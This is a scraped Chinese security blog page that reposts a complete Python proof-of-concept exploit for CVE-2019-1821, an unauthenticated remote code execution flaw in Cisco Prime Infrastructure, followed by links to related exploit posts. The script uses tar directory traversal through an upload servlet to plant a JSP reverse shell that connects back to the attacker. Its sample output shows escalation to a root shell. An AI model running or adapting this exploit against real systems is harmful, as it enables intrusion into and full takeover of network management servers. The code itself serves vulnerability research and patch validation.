CVE-2019-1821 Cisco Prime Infrastructure Remote Code Execution
https://srcincite.io/blog/2019/05/17/panic-at-the-cisco-unauthenticated-rce-in-prime-infrastructure.html

Cscan思科扫描插件 (IP/Port/HostName/Boot/Version)
https://www.cnblogs.com/k8gege/p/10679491.html

CVE-2019-1821 Exploit

#!/usr/bin/python

"""

Cisco Prime Infrastructure Health Monitor HA TarArchive Directory Traversal Remote Code Execution Vulnerability

Steven Seeley (mr_me) of Source Incite - 2019

SRC: SRC-2019-0034

CVE: CVE-2019-1821

Example:

========

saturn:~ mr_me$ ./poc.py

(+) usage: ./poc.py <target> <connectback:port>

(+) eg: ./poc.py 192.168.100.123 192.168.100.2:4444

saturn:~ mr_me$ ./poc.py 192.168.100.123 192.168.100.2:4444

(+) planted backdoor!

(+) starting handler on port 4444

(+) connection from 192.168.100.123

(+) pop thy shell!

python -c 'import pty; pty.spawn("/bin/bash")'

[prime@piconsole CSCOlumos]$ /opt/CSCOlumos/bin/runrshell '" && /bin/sh #'

/opt/CSCOlumos/bin/runrshell '" && /bin/sh #'

sh-4.1# /usr/bin/id

/usr/bin/id

uid=0(root) gid=0(root) groups=0(root),110(gadmin),201(xmpdba) context=system_u:system_r:unconfined_java_t:s0

sh-4.1# exit

exit

exit

[prime@piconsole CSCOlumos]$ exit

exit

exit

"""

import sys

import socket

import requests

import tarfile

import telnetlib

from threading import Thread

from cStringIO import StringIO

from requests.packages.urllib3.exceptions import InsecureRequestWarning

requests.packages.urllib3.disable_warnings(InsecureRequestWarning)

def _build_tar(ls, lp):

    """

    build the tar archive without touching disk

    """

    f = StringIO()

    b = _get_jsp(ls, lp)

    t = tarfile.TarInfo("../../opt/CSCOlumos/tomcat/webapps/ROOT/si.jsp")

    t.size = len(b)

    with tarfile.open(fileobj=f, mode="w") as tar:

        tar.addfile(t, StringIO(b))

    return f.getvalue()

def _get_jsp(ls, lp):

    jsp = """<%@page import="java.lang.*"%>

<%@page import="java.util.*"%>

<%@page import="java.io.*"%>

<%@page import="java.net.*"%>

<%

  class StreamConnector extends Thread

  {

    InputStream sv;

    OutputStream tp;

    StreamConnector( InputStream sv, OutputStream tp )

    {

      this.sv = sv;

      this.tp = tp;

    }

    public void run()

    {

      BufferedReader za  = null;

      BufferedWriter hjr = null;

      try

      {

        za  = new BufferedReader( new InputStreamReader( this.sv ) );

        hjr = new BufferedWriter( new OutputStreamWriter( this.tp ) );

        char buffer[] = new char[8192];

        int length;

        while( ( length = za.read( buffer, 0, buffer.length ) ) > 0 )

        {

          hjr.write( buffer, 0, length );

          hjr.flush();

        }

      } catch( Exception e ){}

      try

      {

        if( za != null )

          za.close();

        if( hjr != null )

          hjr.close();

      } catch( Exception e ){}

    }

  }

  try

  {

    String ShellPath = new String("/bin/sh");

    Socket socket = new Socket("__IP__", __PORT__);

    Process process = Runtime.getRuntime().exec( ShellPath );

    ( new StreamConnector( process.getInputStream(), socket.getOutputStream() ) ).start();

    ( new StreamConnector( socket.getInputStream(), process.getOutputStream() ) ).start();

  } catch( Exception e ) {}

%>"""

    return jsp.replace("__IP__", ls).replace("__PORT__", str(lp))

def handler(lp):

    """

    This is the client handler, to catch the connectback

    """

    print "(+) starting handler on port %d" % lp

    t = telnetlib.Telnet()

    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

    s.bind(("0.0.0.0", lp))

    s.listen(1)

    conn, addr = s.accept()

    print  "(+) connection from %s" % addr[0]

    t.sock = conn

    print "(+) pop thy shell!"

    t.interact()

def exec_code(t, lp):

    """

    This function threads the client handler and sends off the attacking payload

    """

    handlerthr = Thread(target=handler, args=(lp,))

    handlerthr.start()

    r = requests.get("https://%s/si.jsp" % t, verify=False)

def we_can_upload(t, ls, lp):

    """

    This is where we take advantage of the vulnerability

    """

    td = _build_tar(ls, lp)

    bd = {'files': ('si.tar', td)}

    h = {

      'Destination-Dir': 'tftpRoot',

      'Compressed-Archive': "false",

      'Primary-IP' : '127.0.0.1',

      'Filecount' : "1",

      'Filename': "si.tar",

      'Filesize' : str(len(td)),

    }

    r = requests.post("https://%s:8082/servlet/UploadServlet" % t, headers=h, files=bd, verify=False)

    if r.status_code == 200:

        return True

    return False

def main():

    if len(sys.argv) != 3:

        print "(+) usage: %s <target> <connectback:port>" % sys.argv[0]

        print "(+) eg: %s 192.168.100.123 192.168.100.2:4444" % sys.argv[0]

        sys.exit(-1)

    t  = sys.argv[1]

    cb = sys.argv[2]

    if not ":" in cb:

        print "(+) using default connectback port 4444"

        ls = cb

        lp = 4444

    else:

        if not cb.split(":")[1].isdigit():

            print "(-) %s is not a port number!" % cb.split(":")[1]

            sys.exit(-1)

        ls = cb.split(":")[0]

        lp = int(cb.split(":")[1])

    if we_can_upload(t, ls, lp):

        print "(+) planted backdoor!"

        exec_code(t, lp)

if __name__ == '__main__':

    main()

收藏的一些Exphttps://github.com/k8gege/CiscoExploit

[EXP]CVE-2019-1821 Cisco Prime Infrastructure思科未授权远程代码执行漏洞的更多相关文章

  1. PHP-FPM 远程代码执行漏洞(CVE-2019-11043)复现-含EXP

    搭建容器 安装golang 利用程序 https://github.com/neex/phuip-fpizdam 安装git Cobra包安装 go get -v github.com/spf13/c ...

  2. windows 快捷方式(.lnk)代码执行漏洞(CVE-2017-8464 )[附EXP生成工具]

    最近看到网上曝光了一个windows远程代码执行的漏洞,黑客可以通过一个快捷方式在用户电脑上执行任意指令,于是便对该漏洞进行了部分分析. 1. 漏洞描述: MicrosoftWindows .LNK  ...

  3. FlexPaper 2.3.6 远程命令执行漏洞 附Exp

    影响版本:小于FlexPaper 2.3.6的所有版本 FlexPaper (https://www.flowpaper.com) 是一个开源项目,遵循GPL协议,在互联网上非常流行.它为web客户端 ...

  4. Cisco Smart Install远程命令执行漏洞

    0x01前言 在Smart Install Client代码中发现了基于堆栈的缓冲区溢出漏洞,该漏洞攻击者无需身份验证登录即可远程执行任意代码.cisco Smart Install是一种“即插即用” ...

  5. Joomla![1.5-3.4.5]反序列化远程代码执行EXP(直接写shell)

    Usage:x.py http://xxx.com # coding=utf-8# author:KuuKi# Help: joomla 1.5-3.4.5 unserialize remote co ...

  6. “全栈2019”Java异常第二十一章:finally不被执行的情况

    难度 初级 学习时间 10分钟 适合人群 零基础 开发语言 Java 开发环境 JDK v11 IntelliJ IDEA v2018.3 文章原文链接 "全栈2019"Java异 ...

  7. “全栈2019”Java异常第五章:一定会被执行的finally代码块

    难度 初级 学习时间 10分钟 适合人群 零基础 开发语言 Java 开发环境 JDK v11 IntelliJ IDEA v2018.3 文章原文链接 "全栈2019"Java异 ...

  8. “全栈2019”Java第四十二章:静态代码块与初始化顺序

    难度 初级 学习时间 10分钟 适合人群 零基础 开发语言 Java 开发环境 JDK v11 IntelliJ IDEA v2018.3 文章原文链接 "全栈2019"Java第 ...

  9. RHSA-2017:2029-中危: openssh 安全和BUG修复更新(存在EXP、代码执行、本地提权)

    [root@localhost ~]# cat /etc/redhat-release CentOS Linux release 7.2.1511 (Core) 修复命令: 使用root账号登陆She ...

随机推荐

  1. 使用Vue CLI构建Vue项目

    第一步:首先在控制台输入vue --version,如果出现版本号则进入第三步:否则进入第二步: 第二步:输入npm install cnpm -g --registry=https://regist ...

  2. Vue+element 解决浏览器自动填充记住的账号密码问题

    我们在做form表单的时候,会发现,浏览器会自动的将我们之前保存的密码, 自动的填充到表单中input 为 type="password" 的框中 登录页面也就算了,但是注册页面就 ...

  3. android studio学习----gradle配置

    转载地址:http://blog.csdn.net/loongggdroid/article/details/47037413 1.gradle的简单介绍 Gradle是可以用于Android开发的新 ...

  4. UIPickerView基本使用

    UIPickerView是很常用的一个UI控件,在各种购物平台选择地址时候都是必备的,下面我们来说一下具体的使用 首先UIPickerView的创建,与多数控件一样,分配内存并设置位置尺寸. 重要的的 ...

  5. Centos7安装pip或pip3

    1.使用Python2安装pip wget wget --no-check-certificate https://pypi.python.org/packages/source/p/pip/pip- ...

  6. selenium 框架

    结构如下: test_project|--logs|---pages |---register_page.py|      |---base_page.py|---test_case       |- ...

  7. C语言 严蔚敏数据结构 线性表之链表实现

    博主最近在考成都大学皇家计算机科学与技术专业,复习专业课数据结构,正好学习到线性结构中的线性表用链表这种存储结构来实现. 首先,数据结构包括1.数据的操作2.逻辑结构3.存储结构(数据结构三要素. 直 ...

  8. JS高阶---简介+数据类型

    首先看下大概流程 [一]基础 接下来看下数据类型分类和判断 (1)数据类型分类 基本类型/值类型5种 ---字符串String.数字Number.布尔值Boolean.未定义undefined.空nu ...

  9. Samba应用案例

    一.配置文件详解 Samba配置文件非常简洁明了,所有的设置都在 /etc/samba/smb.conf 配置文件中进行,通过对该配置文件的修改,可以将Samba配置为一台匿名文件服务器.基于账户的文 ...

  10. 防御流类型的xss攻击

    1.建立一个工具类 package im.lsn.oss.exhibition.utils; import org.apache.commons.lang3.StringUtils; import j ...